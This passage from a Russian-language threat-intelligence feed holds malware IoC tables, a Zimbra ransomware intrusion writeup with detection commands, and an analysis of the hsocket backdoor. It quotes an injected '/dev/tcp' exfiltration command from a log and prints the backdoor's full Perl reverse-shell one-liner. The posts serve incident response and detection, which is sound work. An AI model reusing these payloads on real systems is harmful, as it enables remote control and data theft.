<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e2c082a5-61e9-4506-bae9-9b2ec1c5d374" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>powerd</code></td>
<td>0def5f0f50482c887a8fa645e1347e8d</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b57e6b4d-46a4-4e41-9c7a-2a58df95885f" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>ProcessMonitor.exe</code></td>
<td>85a9e9de754b99095644726faf6124f7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9b04a605-b1bf-41a9-8abb-f2268c467dc8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>fe323f8f6d84464b7a7f35d694c64851</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ee4946ff-05be-4ffd-aa6c-9be8178d5467" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>3874e14eda06779d777f182c39ac9dfe</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/def73865-f356-4ae8-909f-7f75cc7e8c3e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>1841b49525e0b3ca1a17556e6af775c7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ce98287b-092a-4208-867d-138857a40d1c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-acpid</code></td>
<td>fc5a346c6bbec19a8463977e05fa14c2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/caa88e55-b725-4623-9fc8-42412fceecfc" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-acpid</code></td>
<td>aa59ebd082118ab7c0a0fded580364da</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/4d018ec6-d77d-4ec4-a6f0-c9eeb909efa1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-network-check</code></td>
<td>fe323f8f6d84464b7a7f35d694c64851</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/035f473d-b4f0-42b4-aad0-bd8609e3a4f1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>cc622348b636e654d68763447cdb4599</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/92ca1443-bbd9-4a57-b9a3-4ed19b9b7fe0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>517ae29a0048d9f21d0debe9476b94e5</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8e32f73f-203a-408f-a66e-123e35003ed4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>40c5c2686fbc451386fc296994664fa2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/833a1f01-ff28-4f92-80c2-f2fd0d7ef11e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>9dec74a38d9b6e668d616b2ec45159d5</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2204c96f-eaeb-4e10-be93-a9117872e683" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>0df3c7d1f30e984318cf3a3a98b9d4d2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6b597426-c69c-4393-a6c3-991ac50df2a9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>005b0b12b59930845fabc6f45c6ca725</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5dc5700c-910a-41ad-afc8-cc33e701e188" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>test</code></td>
<td>85ba7a059f33bf40fb1386fd506b38a7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/901a17cb-c300-4787-b80c-b90bf10592d7" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>udiskd</code></td>
<td>846ec88090311868d4e19658ef538077</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5174b645-410d-4985-8aa7-4df97aa2d92c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>update</code></td>
<td>4b6526c735279faf3f938e480c75471b</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7ddb51b6-a903-4f7a-b3a7-642c6acaeef6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>w.exe</code></td>
<td>0acd888653dba95628f3f403f3c03295</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9117b8f8-c441-4466-8734-8f53b54a70a3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>watchdog.exe</code></td>
<td>d363776b4adc2f3a513e0637eb7e957f</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fe0b49cb-092d-43bb-a8f0-c8803b232afe" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>worker.exe</code></td>
<td>b6e904360c346665117dc97a096f8f96</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/dd44a163-c8d7-41da-bf01-492809af4fa6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix_trapper</code></td>
<td>e54147cf021827f5eb9c19f41e561aa3</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/53d7cec5-7436-4132-a986-2b3f28b82959" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix_trapper</code></td>
<td>da1d0a016d5ee5190475fe0a8d69e139</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f4ecd8b1-f8c5-4e88-a54a-4edd1f15faf2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-agent</code></td>
<td>e8cdefcbf2850a233fe6f13f22ec0efb</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7b67039c-1f2c-419f-bc11-0ff9cf1a7a36" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-trapper</code></td>
<td>860fd8008365a3e61a21328b0c431076</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/910a909d-6635-4704-89b1-270c3845fa35" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-trapper</code></td>
<td>72fbfee7fabc9be88f263604addb1860</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2595466a-78f9-4893-aa13-b55aec171e40" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>znfs.exe</code></td>
<td>31d4623ef6d7501c48ac2b3f47e3db16</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6133992e-db1f-4625-891f-5b9bba613c05" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<h4>Сетевые индикаторы</h4>
<table>
<tr>
<th>Адрес</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td><code>adv-click-track.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/340ebc5f-fbcc-428f-8326-d376176cd547" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>adv-click-track.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/60779cde-8139-4c22-87ec-0644482691f8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>cdn.debian-check.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ec2009ca-6479-4091-91f7-67fd3ca5fc55" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>check.cert-update.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9e305ae2-8a50-4efc-a78d-1f6afac461da" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>dpkg.debian-check.cloud</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3a06f1b2-9e00-48cb-bc28-973d136abff8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>scrt.vdyke.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fcb62ad0-8212-4361-aacb-947a17ac0fff" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>status.cert-update.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/912be00e-8521-45aa-b958-d160b377986e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>195.58.137.115</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e5eb7d34-2df4-41d6-916e-5977ab2897d3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>199.119.136.138</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/384d0b0e-ed0b-44b9-9f60-01dc4f3cd120" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>213.139.205.166</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5d226d28-23ef-4dbf-9be6-1b83794ff478" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>216.146.26.31</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/af843866-7e01-4bbc-ac9e-e3eef7c8c431" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>45.145.171.112</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6bee73b4-d2bf-4c5b-a915-29e52796e9f1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>45.59.170.247</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e36e99b7-0c72-48b2-9a2b-a1c54a93a1c6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>91.221.191.228</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/126d3776-d330-4fcd-93b0-36774d1fdf02" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>94.124.160.113</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/afadbed6-2ee9-4b30-a114-9d8c8a97f88a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>94.124.160.12</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c20b7fda-0f31-4c6a-8477-7b770d62ee93" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ti</span> <span class="hashtag">#malware</span> <span class="hashtag">#apt</span> <span class="hashtag">#ioc</span> <br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Ваш сервер Zimbra под угрозой</title>
		<link>/your-zimbra-server-is-at-risk/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Thu, 10 Sep 2026 16:23:41 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%b2%d0%b0%d1%88-%d1%81%d0%b5%d1%80%d0%b2%d0%b5%d1%80-zimbra-%d0%bf%d0%be%d0%b4-%d1%83%d0%b3%d1%80%d0%be%d0%b7%d0%be%d0%b9/</guid>

					<description><![CDATA[Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости CVE-2026-73570 и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на…]]></description>
										<content:encoded><![CDATA[<p>Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости <a href="https://nvd.nist.gov/vuln/detail/cve-2026-73570" rel="noopener" target="_blank">CVE-2026-73570</a> и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на серверах Zimbra с середины августа.</p>
<p><em>Дисклеймер: если вы используете неактуальную версию ПО Zimbra и не обнаружили на своем почтовом сервере приведенных ниже индикаторов компрометации конкретной кампании шифровальщика TargetZimbra, то это не значит, что ваш сервер гарантированно не скомпрометирован. Уязвимость CVE-2026-73570 может использоваться другими злоумышленниками, например, для установки майнеров, а также APT-группировками, нацеленными на компрометацию инфраструктуры всей организации.</p>
<p></em></p>
<blockquote>
<p>Уязвимость CVE-2026-73570 позволяет атакующему осуществлять внедрение и выполнение вредоносных команд на почтовом сервере Zimbra с правами пользователя zimbra без предварительной аутентификации в результате недостаточной санации ввода в компоненте SNMP.</p>
<p>Для успешной эксплуатации на почтовом сервере должна быть установлена версия ПО Zimbra Collaboration Suite ниже 10.1.20, а также установлен пакет zimbra-snmp и включены SNMP-уведомления. Уязвимость эксплуатируется в результате отправки специально сформированного SMTP-запроса через порты 25, 465 или 587.</p>
</blockquote>
<p>👀 <strong>Сценарий атаки:</p>
<p></strong>1. В результате эксплуатации уязвимости CVE-2026-73570 злоумышленники создают на почтовом сервере файл <code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt</code> (или <code>versions.txt</code>), содержащий сведения об используемой на сервере версии ПО Zimbra. Созданный файл является для атакующего индикатором успешной эксплуатации уязвимости.</p>
<p>2. На следующем этапе злоумышленники загружают JSP-шеллы в директорию почтового сервера <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>. Кроме того, зафиксировано внедрение на сервер хакерского инструмента Gsocket. Ранее мы уже писали подробную заметку о том, <a href="https://t.me/ptescalator/112" rel="noopener" target="_blank">как детектировать инструмент Gsocket</a>.</p>
<p>3. Далее злоумышленники загружают шифровальщик TargetZimbra, написанный на языке Go. После запуска указанный вредоносный модуль шифрует файлы с использованием алгоритма ChaCha20 в каталоге /opt/zimbra/ и его подкаталогах.</p>
<p>4. После шифрования файлов шифровальщик изменяет их расширение на <code>.elock</code>, а также создает в зашифрованных директориях файлы <code>!README_RECOVER.txt</code>, содержащие контактную информацию и сведения для выкупа расшифровки данных. По окончании работы вредоносный модуль TargetZimbra удаляет себя из системы.</p>
<p>📫 <strong>Как проверить ваш почтовый сервер Zimbra на предмет наличия признаков компрометации?</p>
<p></strong>1. В основном системном журнале почтовой службы<code> /var/log/maillog</code> записи, содержащие подстроку <code>changed from stopped to</code>, перед которой записана shell-команда или иная подозрительная нагрузка, являются признаком эксплуатации уязвимости CVE-2026-73570.</p>
<p>Для поиска вредоносных событий на вашем сервере может использоваться следующая команда: <code>grep &quot;changed from stopped to&quot; /var/log/maillog</p>
<p></code>Пример выполнения команды <code>id</code> и передачи ее вывода на С2-сервер злоумышленников:</p>
<pre><code>Aug 29 14:23:46 zimbra-server postfix/submission/smtpd[108829]: improper command pipelining after EHLO from unknown[[REDACTED_IP_1]]: : Service status change: h ;id&gt;/dev/tcp/[REDACTED_IP_2]/1337; changed from stopped to running\r\nQUIT\r\n  

- время эксплуатации уязвимости: 29 августа 2026 года в 14:23:46; 
- [REDACTED_IP_1]: С2 адрес злоумышленников; 
- id&gt;/dev/tcp/[REDACTED_IP_2]/1337: команда для выполнения на системе.</code></pre>
<p>2. Наличие нестандартных JSP-файлов, которые не относятся к ПО Zimbra и были созданы либо изменены за последние месяцы в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах. Характерными признаками вредоносных JSP-файлов являются наличие обфусцированного кода, закодированных строк, а также нетипичная обработка GET- и POST-запросов.</p>
<p>Для поиска недавно созданных или измененных JSP-файлов на вашем сервере могут использоваться следующие команды:</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newermt &#039;2026-07-01&#039;</code> (поиск по дате изменения файла)</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newerBt &#039;2026-07-01&#039;</code> (поиск по дате создания файла)</p>
<p><em>Обратите внимание, что не все файловые системы Linux хранят дату создания файла. Если система не отслеживает указанную метку, то команда find выдаст ошибку.</p>
<p></em>Также проверьте сервер антивирусными средствами.</p>
<p>3. В журнале доступа WEB-сервера (например, для WEB-сервера Nginx стандартное расположение <code>/var/log/nginx/access.log</code>) записи об обращении к нестандартным JSP-файлам (с кодом ответа 200), расположенным в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах (в частности, часто используемый каталог <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>), могут свидетельствовать о наличии WEB-shell&#039;ов на почтовом сервере. Если WEB-shell получает команды через GET-запрос, то передаваемая команда будет отображена в журнале.</p>
<p>Пример вывода результата выполнения команды <code>ls</code> в браузер атакующего:</p>
<pre><code>[REDACTED_IP] - - [29/Aug/2026:12:41:35 +0000] GET /public/bzng.jsp?p=ls HTTP/1.0 200 443 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 34889  

- [REDACTED_IP]: С2 адрес злоумышленников; 
- [29/Aug/2026:12:41:35 +0000]: время обращения к WEB-shell; 
- public/bzng.jsp: расположение WEB-shell; 
- ls: выполняемая команда.</code></pre>
<p>Кроме того, исследуя сетевую инфраструктуру злоумышленников, мы обнаружили WEB-панели платформы <a href="https://github.com/Ed1s0nZ/CyberStrikeAI" rel="noopener" target="_blank">CyberStrikeAI</a>, размещенные на нескольких С2-серверах (<em>скриншоты 1 и 2</em>).</p>
<figure class="wp-block-image"><img width="1024" height="834" src="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg 1024w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-300x244.jpg 300w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-768x625.jpg 768w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41.jpg 1045w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 1</figcaption></figure>
<p><code>CyberStrikeAI</code> — открытая платформа, предназначенная для автоматизации тестирования на проникновение с использованием ИИ.</p>
<figure class="wp-block-image"><img width="1024" height="523" src="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg 1024w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-300x153.jpg 300w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-768x392.jpg 768w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1536x784.jpg 1536w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-2048x1046.jpg 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 2</figcaption></figure>
<p>Наличие работающей платформы на С2-сервере злоумышленников может указывать на ее применение как на отдельных этапах атаки (например, первоначальной компрометации сервера), так и в рамках всего инцидента.</p>
<p>💡 <strong>Рекомендуем:</p>
<p></strong>1. Обновить ПО Zimbra на вашем почтовом сервере до актуальной версии. В идеале также переустановить ОС сервера с переносом всех почтовых данных.</p>
<p>2. В случае невозможности быстрого обновления ПО временным решением может быть отключение SNMP-уведомлений и удаление пакета <code>zimbra-snmp</code>.</p>
<p>3. Кроме того, проверьте почтовый сервер антивирусными средствами, а также вручную посмотрите нестандартные JSP-файлы, созданные за последние месяцы в служебных каталогах Zimbra.</p>
<p><strong>Файловые индикаторы компрометации:</strong></p>
<blockquote>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.tx</code>t или <code>versions.txt</code> — файл, содержащий версию ПО Zimbra;</p>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/[Filename].jsp</code> — WEB-shell;</p>
<p><code>/opt/zimbra/log/defunct</code> — Gsocket;</p>
<p><code>elockc[a-z]</code> (например, <code>elockcl</code>) — шифровальщик;</p>
<p><code>runloop.sh</code> — скрипт, создаваемый шифровальщиком;</p>
<p><code>!README_RECOVER.txt</code> — записка злоумышленников;</p>
<p><code>*.elock</code> — файлы с расширением <code>.elock</code>.</p>
</blockquote>
<p><strong>Сетевые индикаторы компрометации:</strong></p>
<pre><code>135.136.63.63
139.28.49.138
146.70.169.246
193.24.211.91
193.32.126.168
31.177.110.136
37.32.73.156
64.62.156.162
64.62.156.222
64.62.156.94
88.214.21.183
89.116.171.182
89.117.94.35</code></pre>
<p><strong><br />
Gsocket:</strong></p>
<pre><code>*.gs.thc.org
gsocket.io
152.53.173.29
152.53.173.30
176.65.149.52
212.132.98.170
217.154.53.116
217.154.53.187
45.90.4.121
45.90.4.128
51.91.190.241
51.91.190.242</code></pre>
<p><span class="hashtag">#IR</span> <span class="hashtag">#CVE</span> <span class="hashtag">#Malware</span> <span class="hashtag">#detect</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Din, din — кто там?</title>
		<link>/ding-ding-whos-there/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Wed, 09 Sep 2026 12:17:40 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/din-din-%d0%ba%d1%82%d0%be-%d1%82%d0%b0%d0%bc/</guid>

					<description><![CDATA[Din, din — кто там? 🔔 Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку, которую мы назвали DENOmination Group. В 2026 году мы зафиксировали ее активность против российских организаций оборонно-промышленного,…]]></description>
										<content:encoded><![CDATA[<p><strong>Din, din — кто там?</strong> 🔔</p>
<p>Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку, которую мы назвали <strong>DENOmination Group</strong>.</p>
<p>В 2026 году мы зафиксировали ее активность против российских организаций оборонно-промышленного, военного, финансового и консалтингового секторов.</p>
<p>Ключевая особенность атак — использование легитимной среды выполнения Deno для запуска вредоносного JavaScript/TypeScript-кода. В исследованных цепочках мы наблюдали загрузчик DinDoor, агент удаленного доступа DenoRAT, вредоносные MSI- и LNK-файлы, ротацию C2-инфраструктуры и несколько связанных способов первоначальной доставки.</p>
<p>Пересечения в кодовой базе, конфигурационных параметрах, логике построения цепочек и сетевой инфраструктуре позволили связать наблюдаемые эпизоды с активностью одной группировки.</p>
<p>В исследовании разобрали архитектуру DinDoor и DenoRAT, механизмы закрепления и взаимодействия с C2, инфраструктурные пересечения, TTP и возможную модель использования общей платформы несколькими операторами.</p>
<p>Подробности —<strong> </strong><a href="https://ptsecurity.com/research/pt-esc-threat-intelligence/denomination-group-deno-in-attack-chains-targeting-russian-organizations/?utm_source=tg_esc&#038;utm_medium=deno&#038;utm_campaign=09_09" rel="noopener" target="_blank">в нашем блоге</a> 🦖</p>
<p><span class="hashtag">#TI</span> <span class="hashtag">#APT</span> <span class="hashtag">#Malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Он вам не gsocket</title>
		<link>/hes-not-your-gsocket/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 08 Sep 2026 14:44:27 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%be%d0%bd-%d0%b2%d0%b0%d0%bc-%d0%bd%d0%b5-gsocket/</guid>

					<description><![CDATA[Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket). После получения первоначального доступа и установки веб-шелла…]]></description>
										<content:encoded><![CDATA[<p><strong>Он вам не gsocket</strong> 😑</p>
<p>В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент <code>hsocket</code> (не путать с <code>gsocket</code>).</p>
<p>После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта.</p>
<p>1️⃣ <code>hsocket</code> — бэкдор, имеющий следующий функционал:</p>
<p>• запуск интерактивной командной оболочки</p>
<p>• запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter)</p>
<p>• сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов)</p>
<p>• защита файлов от удаления</p>
<p>• установление reverse shell-соединения с управляющим сервером с помощью кода на Perl:</p>
<pre><code>perl -e &quot;use Socket;\$i=\&quot;$hsHOST\&quot;;\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname(&#039;tcp&#039;));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,&#039;&gt;&amp;S&#039;);open(STDOUT,&#039;&gt;&amp;S&#039;);open(STDERR,&#039;&gt;&amp;S&#039;);exec(&#039;sh -i&#039;);};&quot;</code></pre>
<p>• скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas)</p>
<p>2️⃣ <code>hfsm</code> — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы.</p>
<p>3️⃣ <code>.hsrc</code> — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов.</p>
<p>В рамках данного исследования нам удалось <a href="https://alexiregar.wordpress.com/" rel="noopener" target="_blank">обнаружить статью</a>, написанную на индонезийском языке, в которой было описано данное ВПО.</p>
<p>Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском:</p>
<pre><code>// Fungsi untuk tampilan halaman login
$Warning = &quot;### ⚠️Info!! Terdekteksi Aktivitas Dari&quot;;</code></pre>
<p>Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода:</p>
<pre><code>//------------------GECKO SHELL, RECODED BY AYANA--------------------//
&lt;!-- Gecko Folder File Manager --&gt;</code></pre>
<p><strong>IoC:</strong></p>
<pre><code>hsocket.io
/tmp/hs-data/</code></pre>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#detect</span> <span class="hashtag">#ioc</span> <span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Drama Rat: вредоносное приложение, после установки которого действительно становится печально</title>
		<link>/drama-rat-a-malicious-app-that-once-installed-really-does-make-you-sad/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Fri, 04 Sep 2026 14:44:48 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/drama-rat-a-malicious-app-that-once-installed-really-does-make-you-sad/</guid>

					<description><![CDATA[Недавно в Департамент комплексного реагирования на киберугрозы (PT ESC IR) на исследование поступил ряд образцов банковского трояна для Android с функциями удаленного управления — Drama Rat. Это вредоносное семейство распространяется с помощью…]]></description>
										<content:encoded><![CDATA[<p>Недавно в Департамент комплексного реагирования на киберугрозы (PT ESC IR) на исследование поступил ряд образцов банковского трояна для Android с функциями удаленного управления — Drama Rat.</p>
<p>Это вредоносное семейство распространяется с помощью фишинговых сообщений в мессенджерах и маскируется под VPN-сервисы, банковские приложения и другие взломанные утилиты со встроенной платной функциональностью.</p>
<p>В ходе исследования <a href="https://habr.com/ru/companies/pt/articles/1077814/" rel="noopener" target="_blank">выяснилось</a>, что все приложения являются дропперами-загрузчиками. При запуске дроппера на сервер управления отправляется «слепок устройства». В ответ С2-сервер отправляет полезную нагрузку, которая впоследствии реализует основные функции трояна.</p>
<p>📱 Для полноценного функционирования установленному трояну нужен доступ к службе «Специальных возможностей» Android — за счет этого он автоматически предоставляет себе необходимые разрешения и получает полный контроль над устройством.</p>
